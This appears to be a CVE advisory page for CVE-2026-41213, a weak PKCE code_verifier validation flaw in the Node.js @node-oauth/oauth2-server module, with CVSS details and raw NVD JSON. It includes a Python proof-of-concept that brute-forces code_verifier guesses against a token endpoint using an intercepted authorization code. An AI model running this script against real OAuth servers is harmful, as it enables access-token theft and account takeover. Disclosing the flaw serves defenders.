Security Vulnerability Report
CVE-2026-41213 CVSS 5.9 MEDIUM

CVE-2026-41213

Published: 2026-04-23 19:17:29
Last Modified: 2026-04-25 02:16:02

Description

@node-oauth/oauth2-server is a module for implementing an OAuth2 server in Node.js. The token exchange path accepts RFC7636-invalid code_verifier values (including one-character strings) for S256 PKCE flows. Because short/weak verifiers are accepted and failed verifier attempts do not consume the authorization code, an attacker who intercepts an authorization code can brute-force code_verifier guesses online until token issuance succeeds.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Not explicitly listed in the provided information.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def brute_force_pkce(target_url, auth_code, client_id, redirect_uri):
    # Since the vulnerability accepts short verifiers, we try a list of weak candidates.
    # In a real scenario, this list could be expanded or sequential.
    weak_verifiers = ['a', '1', '123', 'test', 'code', 'admin', 'xyz']
    for verifier in weak_verifiers:
        payload = {
            'grant_type': 'authorization_code',
            'code': auth_code,
            'code_verifier': verifier,
            'redirect_uri': redirect_uri,
            'client_id': client_id,
        }
        try:
            response = requests.post(target_url, data=payload)
            if response.status_code == 200:
                json_resp = response.json()
                if 'access_token' in json_resp:
                    return f"[+] Success! Verifier: {verifier}, Token: {json_resp['access_token']}"
        except Exception as e:
            print(f"Error: {e}")
    return "[-] Failed to brute force the code verifier."


# Example usage
# target = "https://example.com/oauth/token"
# code = "intercepted_authorization_code"
# print(brute_force_pkce(target, code, "public_client", "https://example.com/callback"))

References

https://github.com/node-oauth/node-oauth2-server/security/advisories/GHSA-jhm7-29pj-4xvf

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-41213",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-23T19:17:29.400",
    "lastModified": "2026-04-25T02:16:02.250",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "@node-oauth/oauth2-server is a module for implementing an OAuth2 server in Node.js. The token exchange path accepts RFC7636-invalid code_verifier values (including one-character strings) for S256 PKCE flows. Because short/weak verifiers are accepted and failed verifier attempts do not consume the authorization code, an attacker who intercepts an authorization code can brute-force code_verifier guesses online until token issuance succeeds."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-307"},
          {"lang": "en", "value": "CWE-1289"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/node-oauth/node-oauth2-server/security/advisories/GHSA-jhm7-29pj-4xvf",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/node-oauth/node-oauth2-server/security/advisories/GHSA-jhm7-29pj-4xvf",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}